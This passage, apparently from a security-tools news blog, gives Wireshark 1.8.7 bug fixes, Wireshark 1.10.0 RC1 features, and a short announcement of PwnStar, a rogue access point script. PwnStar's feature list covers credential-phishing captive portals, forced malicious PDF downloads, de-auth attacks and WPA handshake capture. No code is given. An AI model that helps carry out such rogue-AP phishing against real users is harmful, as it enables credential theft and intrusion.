• Incorrect RTP statistics (Lost Packets indication not ok). (Bug 8321)
• Decoding of GSM MAP E164 Digits. (Bug 8450)
• Silent installer and uninstaller not silent. (Bug 8451)
• Replace use of INCLUDES with AM_CPPFLAGS in all Makefiles to placate recent autotools. (Bug 8452)
• Wifi details are not stored in the Decryption Key Management dialog (post 1.8.x). (Bug 8446)
• IO Graph should not be limited to 100k points (NUM_IO_ITEMS). (Bug 8460)
• geographical_description: hf_gsm_a_geo_loc_deg_of_long 24 bit field truncated to 23 bits. (Bug 8532)
• IRC message with multiple params causes malformed packet exception. (Bug 8548)
• Part of Ping Reply Message in ICMPv6 Reply Message is marked as “Malformed Packet”. (Bug 8554)
• MP2T wiretap heuristic overriding ERF. (Bug 8556)
• Cannot read content of Ran Information Application Error Rim Container. (Bug 8559)
• Endian error and IP:Port error when decoding BT-DHT response message. (Bug 8572)
• “ACE4_ADD_FILE/ACE4_ADD_SUBDIRECTORY” should be “ACE4_APPEND_DATA / ACE4_ADD_SUBDIRECTORY”. (Bug 8575)
• wireshark crashes while displaying I/O Graph. (Bug 8583)
• GTPv2 MM Context (UMTS Key, Quad, and Quint Decoded) incorrectly. (Bug 8596)
• DTLS 1.2 uses wrong PRF. (Bug 8608)
• RTP DTMF digits are no longer displayed in VoIP graph analysis. (Bug 8610)
• Universal port not accepted in RSA Keys List window. (Bug 8618)
• Wireshark Dissector bug with HSRP Version 2. (Bug 8622)
• LISP control packet incorrectly identified as LISP data based when UDP source port is 4341. (Bug 8627)
• Bad tcp checksum not detected. (Bug 8629)
• AMR Frame Type uses wrong Value String. (Bug 8681)

New and Updated Features

There are no new features in this release.

New Protocol Support

There are no new protocols in this release.

Updated Protocol Support

AMR, ASN.1 BER, BAT, Bluetooth DHT, BSSGP, DTLS, E.164, Ericsson A-bis OML, GSM A, GSM MAP, HDFSDATA, ICMP, ICMPv6, ixveriwave, IRC, KDSP, LISP Data, MMS, NFS, OpenWire, PPP, RELOAD, RTP, SASP, SIP, SSL/TLS, TCP, UA3G

New and Updated Capture File Support

Endace ERF, NetScreen snoop.

Full Changelog: here

Download Wireshark v1.8.7

Read More

[Wireshark v1.10.0 RC1] The world’s foremost network protocol analyzer

Wireshark is the world’s foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.

Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Changelog v1.10.0 RC1

Wireshark 1.10.0rc1 has been released. Installers for Windows, OS X, and source code are now available. This is the first release candidate for Wireshark 1.10.0.

New and Updated Features

The following features are new (or have been significantly updated) since version 1.8:

• Wireshark on 32- and 64-bit Windows supports automatic updates.
• The packet bytes view is faster.
• You can now display a list of resolved host names in “hosts” format within Wireshark.
• The wireless toolbar has been updated.
• Wireshark on Linux does a better job of detecting interface addition and removal.
• It is now possible to compare two fields in a display filter (for example: udp.srcport != udp.dstport). The two fields must be of the same type for this to work.
• The Windows installers ship with WinPcap 4.1.3, which supports Windows 8.
• USB type and product name support has been improved.
• All Bluetooth profiles and protocols are now supported.
• Wireshark now calculates HTTP response times and presents the result in a new field in the HTTP response. Links from the request’s frame to the response’s frame and vice-versa are also added.
• The main welcome screen and status bar now display file sizes using strict SI prefixes instead of old-style binary prefixes.
• Capinfos now prints human-readable statistics with SI suffixes by default.
• It is now possible to open a referenced packet (such as the matched request or response packet) in a new window.
• Tshark can now display only the hex/ascii packet data without requiring that the packet summary and/or packet details are also displayed. If you want the old behavior, use -Px instead of just -x.
• Wireshark can be compiled using GTK+ 3.
• The Wireshark application icon, capture toolbar icons, and other icons have been updated.
• Tshark’s filtering and multi-pass analysis have been reworked for consistency and in order to support dependent frame calculations during reassembly. See the man page descriptions for -2, -R, and -Y.
• Tshark’s -G fields2 and -G fields3 options have been eliminated. The -G fields option now includes the 2 extra fields that -G fields3 previously provided, and the blurb information has been relegated to the last column since in many cases it is blank anyway.

Download Wireshark v1.10.0 RC1

Read More

[PwnStar] Version with new Exploits

A bash script to launch a Soft AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing/phishing. Can act as multi-client captive portal using php and iptables.  Launches classic exploits such as evil-PDF. De-auth with aireplay, airdrop-ng or MDK3.

Changes and New Features

• “hotspot_3″ is a simple phishing web page, used with basic menu option 4.
• “portal_simple” is a captive portal which allows you to edit the index.html with the name of the portal eg “Joe’s CyberCafe”. It is used for sniffing.
• “portal_hotspot3″ phishes credentials, and then allows clients through the portal to the internet
• “portal_pdf” forces the client to download a malicious pdf in order to pass through the portal

Updated feature list:

• captive-portal with iptables and php
• more php scripts added
• exploits added
• mdk3 and airdrop deauth

General Features :

• manage interfaces and MACspoofing
• set up sniffing
• serve up phishing or malicious web pages
• launch karmetasploit
• grab WPA handshakes
• de-auth clients
• manage IPtables

Download Here

Read More